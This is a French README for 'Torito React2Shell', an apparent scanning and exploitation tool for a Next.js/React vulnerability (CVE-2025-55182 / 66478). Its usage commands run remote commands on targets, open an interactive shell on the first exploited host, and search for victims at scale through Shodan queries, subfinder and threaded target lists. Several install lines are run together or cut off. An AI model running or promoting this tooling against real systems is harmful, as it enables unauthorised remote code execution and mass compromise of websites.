
Torito React2Shell - Outil de scan et d'exploitation (CVE-2025-55182 / 66478)
pip install -r requirements.txtPATH pour --subfinder (installation via Homebrew brew install subfinder ou Go : go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest ; projet : https://github.com/projectdiscovery/subfinder)pip install shodan (déjà dans requirements) et une clé : export SHODAN_API_KEY=... avec des crédits de requête disponiblespython3 torito_r2s.py --help
Sondage sûr (cible unique)
python3 torito_r2s.py -u https://cible.com
Confirmation de preuve de concept (redirection par canal auxiliaire)
python3 torito_r2s.py -u https://cible.com --confirm
Exploitation avec commande personnalisée
python3 torito_r2s.py -u https://cible.com --exploit-cmd "whoami"
Shell interactif dès la première cible trouvée
python3 torito_r2s.py -u https://cible.com --shell
Analyse de liste avec exportations
python3 torito_r2s.py -l hôtes.txt -t 40 --confirm --json-out résultats.json --csv-out résultats.csv
Shodan uniquement (nécessite clé et crédits)
export SHODAN_API_KEY=votre_clé
python3 torito_r2s.py --shodan 'http.title:"Next.js"' --shodan-limit 50 --confirm
Subfinder uniquement
python3 torito_r2s.py --subfinder cible.com --confirm
Proxy (Burp/Caido)
python3 torito_r2s.py -u https://cible.com --proxy http://127.0.0.1:8080 --confirm
Pipeline via stdin
cat urls.txt | python3 torito_r2s.py --confirm
--exploit-cmd ou --shell.| Option | Description | Défaut |
|---|
-u, --url URL | URL cible unique | — |
-l, --list FICHIER | Fichier avec cibles (une par ligne) | — |
--subfinder DOMAINE | Lancer subfinder pour le domaine et ajouter les résultats | — |
--shodan REQUÊTE | Recherche Shodan (nécessite SHODAN_API_KEY avec crédits) | — |
--shodan-limit N | Max de résultats Shodan par requête | 100 |
-t, --threads N | Concurrence | 20 |
--timeout SEC | Timeout des requêtes | 10 |
--proxy URL | Proxy HTTP/HTTPS | — |
--confirm | Exécuter la preuve de concept basée sur redirection après le sondage | désactivé |
--exploit-cmd "CMD" | Exécuter une charge utile RCE avec la commande | — |
--shell, -i | Ouvrir un shell interactif dès la première exploitation réussie (commande par défaut : id) | désactivé |
--json-out FICHIER | Sauvegarder les résultats en JSON | — |
--csv-out FICHIER | Sauvegarder les résultats en CSV | — |
-v, --verbose | Afficher les sorties/digests décodés dans le tableau | désactivé |